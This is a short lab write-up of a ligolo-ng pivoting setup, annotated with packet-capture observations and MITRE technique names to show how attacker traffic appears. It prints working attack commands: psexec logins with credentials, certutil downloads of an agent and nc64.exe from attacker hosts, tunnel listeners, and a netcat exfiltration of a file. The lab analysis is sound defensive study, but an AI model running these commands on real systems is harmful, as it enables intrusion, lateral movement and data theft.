I started a network capture on BOX-COMPUTER and DC01 on all interfaces during a simple pivoting setup. This showcases significant packets that contextualise attacker behaviour. This is not meant to be a tutorial for ligolo-ng.
| Host | IP |
|---|---|
| kali | 192.168.18.128 |
| BOX-COMPUTER | 192.168.18.5 10.10.15.128 |
| DC01 | 10.10.15.10 |
SMB/Windows Admin Shares
kali compromises BOX-COMPUTER:
impacket-psexec webby/john:'P@ssw0rd'@192.168.18.5
Agent file downloaded to BOX-COMPUTER Ingress Tool Transfer
certutil -urlcache -f http://192.168.18.128/c2/agent.exe .\agent.exe
Agent connected
.\agent.exe -connect 192.168.18.128:11601 -ignore-certProtocol Tunneling
BOX-COMPUTER Capture of the first handshake
interface shown in ligolo console
Add route to the internal subnet, start tunnelling through the agent
Add listener on agent for kali web server.
listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80kali compromised DC01
impacket-psexec webby/Administrator:'P@ssw0rd'@10.10.15.10Despite capturing at both interfaces, BOX-COMPUTER capture can no longer see kali's activities in its internal subnet, due to the tunnel encapsulation and encryption. All packets forth are encrypted within this tunnel.
DC01 capture shows BOX-COMPUTER as the origin of psexec login
Kali wants to exfiltrate file
Download of nc64.exe
certutil -urlcache -f http://10.10.15.128:8888/revshell/nc64.exe .\nc64.exeDC01 capture shows BOX-COMPUTER hosting a web server due to the port forwarding in place
Kali setup listener on agent to listen for file
listener_add --addr 0.0.0.0:5555 --to 0.0.0.0:5555nc -nvlp 5555 > donottouch.txtExfiltration Over Alternative Protocol
DC01 shell send file to agent
.\nc64.exe 10.10.15.128 5555 < donottouch.txtDC01 capture showing file contents in plaintext
Kali received file
listening on [any] 5555 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 46072
^C